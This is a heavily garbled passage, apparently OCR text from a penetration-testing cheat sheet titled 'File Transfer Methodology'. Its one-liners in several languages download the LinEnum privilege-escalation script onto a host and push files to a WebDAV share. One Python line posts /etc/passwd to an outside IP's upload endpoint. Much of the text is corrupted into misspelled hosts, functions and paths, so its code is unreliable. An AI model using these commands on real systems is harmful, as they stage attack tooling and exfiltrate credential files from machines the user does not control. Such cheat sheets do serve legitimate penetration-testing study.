

yprimin." - Import in 1212; urlib.urlnetrieve("https://row.githubusercontent.com/reboetuser/LinEnum/moster/LinEnum. h" "! ("Armum sh")' pyrnens of import urillo-request; urillo-request.uriretrievs("https://row.githubusercontent.com/rebootuser/LinEnum/mo stor/LinEnum.sh", "LinEnum.sh") ppp -r 'blines =
gisle('https://row.githubusercontent.com/rebootuser/LinEnum/moster/LinEnum.sh');
foreach (Slines on Sline sum => Sline) { scho Sline } } | book roky = 'require "est/http"; Pile.wite(Listramak); Vot: HTTPpet(URCausa("http://pile.wite(Listramak); Vot: HTTPpet(URCausa("http://piw.wihawkstreentert.com/rebootuse/Uribinaw/waster/Urib Var airritpee(= ne Activologicc(airmitp.mirritpeeples():1/);
Var airritpee(= ne Activologicc(airmitp.mirritpeeples():1/);
Var airritpee(= ne Activologicc('ACODS.Stream'); BiriStream.Type = 1; BiriStream.Gpen();
BiriStream.Rick(BiriStpSeq.Responsion);
BiriStream.Savelofile(BiritpEeples(airmitpeeples());
BiriStream.Savelofile(Biritpt.Argumenta(1)); List contents of WebDAV share (Windows CBD) copy C:\Path\to\file \\Ceerver-ip>\Dav#WWRost\ ourl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh Instead of DavWWWRoot, you can specify an existing folder on the WebDAV server wgec -qu-https://row.oithubusercontent.com/iulioureng/plaintext/master/Scripts/helloworld.by [New-Object Wat: Neb-Clast]. Download File (Fto: // Carrer-is) / (File); 'C\Path\to\xaxe\File) pythor3 is import requests; requests; post("http://192.168.49.128.8000/upload", filest("files": upen("/eta/junssud", "ht")))" echo USER anonymous >> ftpcommand.txt echo GET (file> >> ftpcommand.txt

Code snippets for file transfer

Download with file_set_contexts():

Bula L Dark

File Transfer Methodology